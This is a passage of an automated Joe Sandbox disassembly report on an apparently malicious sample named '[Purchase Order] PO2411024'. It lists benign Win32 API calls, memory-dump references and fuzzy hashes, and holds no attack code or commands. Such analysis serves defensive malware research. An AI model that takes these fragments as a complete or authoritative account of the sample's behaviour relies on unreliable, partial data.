                                                    • InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 004490D4
                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004490E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$LongWindow$InvalidateRect
                                                    • String ID:
                                                    • API String ID: 1976402638-0
                                                    • Opcode ID: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                    • Instruction ID: 8674d855734444f977eaeabaa32478bd653fbe911923e0a4a3d3eb28cec46bd0
                                                    • Opcode Fuzzy Hash: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                    • Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
                                                    APIs
                                                    • ShowWindow.USER32(?,00000000), ref: 00440A8A
                                                    • EnableWindow.USER32(?,00000000), ref: 00440AAF
                                                    • ShowWindow.USER32(?,00000000), ref: 00440B18
                                                    • ShowWindow.USER32(?,00000004), ref: 00440B2B
                                                    • EnableWindow.USER32(?,00000001), ref: 00440B50
                                                    • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Window$Show$Enable$MessageSend
                                                    • String ID:
                                                    • API String ID: 642888154-0
                                                    • Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                    • Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
                                                    • Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                    • Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Variant$Copy$ClearErrorLast
                                                    • String ID: NULL Pointer assignment$Not an Object type
                                                    • API String ID: 2487901850-572801152
                                                    • Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                    • Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
                                                    • Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                    • Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
                                                    APIs
                                                    • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
                                                    • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                    • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                    • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                    • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                    • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Window$Enable$Show$MessageSend
                                                    • String ID:
                                                    • API String ID: 1871949834-0
                                                    • Opcode ID: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                    • Instruction ID: ab733961f10eda6fa12bc0977b233c6b2b6736debfa9bed553c9f015fe8cd40e
                                                    • Opcode Fuzzy Hash: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                    • Instruction Fuzzy Hash: 6931B3B17443815BF7258E24CCC4BAFB7D0EB95345F08482EF58196291DBAC9845C75A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                    • Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
                                                    • Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                    • Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
                                                    APIs
                                                    • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
                                                    • SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
                                                    • ImageList_ReplaceIcon.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
                                                    • SendMessageW.USER32 ref: 00471AE3
                                                    • DestroyIcon.USER32(?), ref: 00471AF4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Icon$ImageList_MessageSend$CreateDestroyExtractReplace
                                                    • String ID:
                                                    • API String ID: 3611059338-0
                                                    • Opcode ID: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                    • Instruction ID: ff529b192773d28f9e5fe2f6f8d7a9043cb056f7fe4a3f7912da33dbd9270a4a
                                                    • Opcode Fuzzy Hash: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                    • Instruction Fuzzy Hash: FB21AB71600204AFEB10CF64DD85FAA73B5FF88700F10846EFA05AB290DBB4A9428B64
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: DestroyWindow$DeleteObject$IconMove
                                                    • String ID:
                                                    • API String ID: 1640429340-0
                                                    • Opcode ID: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                    • Instruction ID: 1af524ae86da71fe4f89171a472fc693caa25f853ed14bd6ff7d4c509651bbe6
                                                    • Opcode Fuzzy Hash: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                    • Instruction Fuzzy Hash: C6311874200A41DFC710DF24D9D8B3A77E9FB48712F0445AAE946CB262D778E848CB69
                                                    APIs
                                                      • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                      • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                    • _wcslen.LIBCMT ref: 004438CD
                                                    • _wcslen.LIBCMT ref: 004438E6
                                                    • _wcstok.LIBCMT ref: 004438F8
                                                    • _wcslen.LIBCMT ref: 0044390C
                                                    • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
                                                    • _wcstok.LIBCMT ref: 00443931
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                                                    • String ID:
                                                    • API String ID: 3632110297-0
                                                    • Opcode ID: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                    • Instruction ID: d12b8bce329459066c03420e1b0c57cf331e6d1a2def9435cce8fb2ce1fb425a
                                                    • Opcode Fuzzy Hash: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                    • Instruction Fuzzy Hash: 9621B072900305ABDB10AF559C82AAFB7F8FF48711F64482EF95993301E678EA5087A5
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Destroy$DeleteMenuObject$IconWindow
                                                    • String ID:
                                                    • API String ID: 752480666-0
                                                    • Opcode ID: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                    • Instruction ID: 7b220c8407ffc283b2c26cc65a644285b0b18e1ed163c7e0472fb9f2b18bc557
                                                    • Opcode Fuzzy Hash: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                    • Instruction Fuzzy Hash: B7215970600A01DFD714DF29D9E8B3A7BA9BF49312F04855AE8468B352C738EC89CB59
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                    • String ID:
                                                    • API String ID: 3275902921-0
                                                    • Opcode ID: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                    • Instruction ID: 11d86efc281b6c380d974b68bd8b9632be9d9c574e85584f431c859402bfc888
                                                    • Opcode Fuzzy Hash: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                    • Instruction Fuzzy Hash: 9C217C70200A01DFC714DF39D998A6AB7E4BF49311F10862EE959C7392D778D845CB58
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                    • String ID:
                                                    • API String ID: 3275902921-0
                                                    • Opcode ID: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                    • Instruction ID: f2615e71845bffb995fe2c2b9381f89f67980fa6d4eb7dd8f13843e5971e4781
                                                    • Opcode Fuzzy Hash: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                    • Instruction Fuzzy Hash: 54213D70200A01DFD710EF25D9D4A2B37E9BF49312F10896EE945CB352D739D845CB69
                                                    APIs
                                                    • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                    • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                                                    • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                                    • String ID:
                                                    • API String ID: 2833360925-0
                                                    • Opcode ID: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                    • Instruction ID: f8c058edd9890a080c9b5d5c764251204f1987641da473bf5ecf7e3e358c806a
                                                    • Opcode Fuzzy Hash: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                    • Instruction Fuzzy Hash: 1911B632D0011DABCF00DFD9EA489EEB778FF49722F1145AAED04A6204DB755A01CBA4
                                                    APIs
                                                    • SendMessageW.USER32 ref: 004555C7
                                                    • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004555E2
                                                    • DeleteObject.GDI32(?), ref: 00455736
                                                    • DeleteObject.GDI32(?), ref: 00455744
                                                    • DestroyIcon.USER32(?), ref: 00455752
                                                    • DestroyWindow.USER32(?), ref: 00455760
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: DeleteDestroyMessageObjectSend$IconWindow
                                                    • String ID:
                                                    • API String ID: 3691411573-0
                                                    • Opcode ID: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                                    • Instruction ID: 7bbaf3a525edecc9c7f674a1bc178dbce74773f27e06def1294b58b6a87c9b54
                                                    • Opcode Fuzzy Hash: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                                    • Instruction Fuzzy Hash: 3D116071204601DBC710DF69EDC8A2A77A8FB58322F10466AFD10DB292D779D849CB68
                                                    APIs
                                                      • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                      • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                      • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                      • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                      • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                    • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
                                                    • LineTo.GDI32(?,?,?), ref: 004472AC
                                                    • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
                                                    • LineTo.GDI32(?,?,?), ref: 004472C6
                                                    • EndPath.GDI32(?), ref: 004472D6
                                                    • StrokePath.GDI32(?), ref: 004472E4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                                    • String ID:
                                                    • API String ID: 372113273-0
                                                    • Opcode ID: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                    • Instruction ID: 9972a7b2ea06d4c5ad2b855a17b8a9a0d98d12ec42d2644493c4a69bc6448ed6
                                                    • Opcode Fuzzy Hash: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                    • Instruction Fuzzy Hash: 7701BC76101214BBE3119B44ED8DFDF7B6CEF4A710F104259FA01A629187F42A02CBBD
                                                    APIs
                                                    • GetDC.USER32(00000000), ref: 0044CC6D
                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0044CC90
                                                    • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
                                                    • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: CapsDevice$Release
                                                    • String ID:
                                                    • API String ID: 1035833867-0
                                                    • Opcode ID: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                    • Instruction ID: 48d0fedbc9b5ed1f8cca1220e36c4d83aa6571d18a2c693a8c9b468b660f0fbb
                                                    • Opcode Fuzzy Hash: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                    • Instruction Fuzzy Hash: 60015276240214BFFB009F95DD89F5A7BACFF54751F14802EFF089B240D6B098008BA4
                                                    APIs
                                                    • __getptd.LIBCMT ref: 0041708E
                                                      • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                      • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                    • __amsg_exit.LIBCMT ref: 004170AE
                                                    • __lock.LIBCMT ref: 004170BE
                                                    • InterlockedDecrement.KERNEL32(?), ref: 004170DB
